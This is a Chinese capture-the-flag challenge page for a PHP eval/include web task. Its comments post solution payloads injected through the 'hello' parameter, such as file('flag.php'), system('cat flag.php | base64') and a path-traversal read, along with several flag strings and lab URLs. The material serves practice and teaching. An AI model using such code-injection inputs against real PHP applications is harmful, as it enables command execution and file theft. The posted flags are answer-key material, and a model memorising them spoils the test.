evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 16103
提  示:
描  述:
eval
评论
hhthht 2年前

flag{cea9de710e2926a7c49f12318caf3912}

回复 0

ryan777 2年前

根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')

回复 3

AmazingForself 2年前

看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539

回复 0

ryl123569 2年前

?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}

回复 0

xiaobaiermei 2年前

这里应该算的上是个文件包含吧

回复 0

17leaf 2年前

flag{4ccf17345bf8d8b3c5a6d005cf17e00a}

回复 0

cap 2年前

为啥我这样不行 ?hello=system("cat flag.php")

回复 0
Restwlaq 2年前

因为cat查看php的源码,经过var_dump还是字符串形式的代码,php中这样的代码还是被解析了,所以就看不到了。所以必须base64转一下,防止被执行。 ?hello=system(’cat flag.php | base64')

回复 0

你的宝 2年前

http://114.67.175.224:15626/?hello=file(%27flag.php%27)

回复 0

15056775319 2年前

http://114.67.175.224:17077/?hello=system('cat../../../../../../../../flag')

回复 0

dodobird 2年前

flag{6138fe804a171cd4cbfc9ea7cf1d1cd4}

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

kfdwty 攻破了该题 19小时前
z791458703 攻破了该题 1天前
buxixi 攻破了该题 1天前
1720713439 攻破了该题 1天前
shbshb123 攻破了该题 1天前
18075013015 攻破了该题 1天前
dkwang 攻破了该题 2天前
Gsparrow 攻破了该题 2天前
wenbojia 攻破了该题 3天前
DOMAKE 攻破了该题 3天前
别偷我后场 攻破了该题 3天前
Ta7suya 攻破了该题 3天前
liyuanchao 攻破了该题 3天前
qweQWERT 攻破了该题 3天前
咔咔 攻破了该题 3天前
lishenyuchen 攻破了该题 3天前
摇曳露营芝麻凛 攻破了该题 3天前
1745085539 攻破了该题 4天前
3287973822 攻破了该题 4天前
hulihaha 攻破了该题 4天前
问题反馈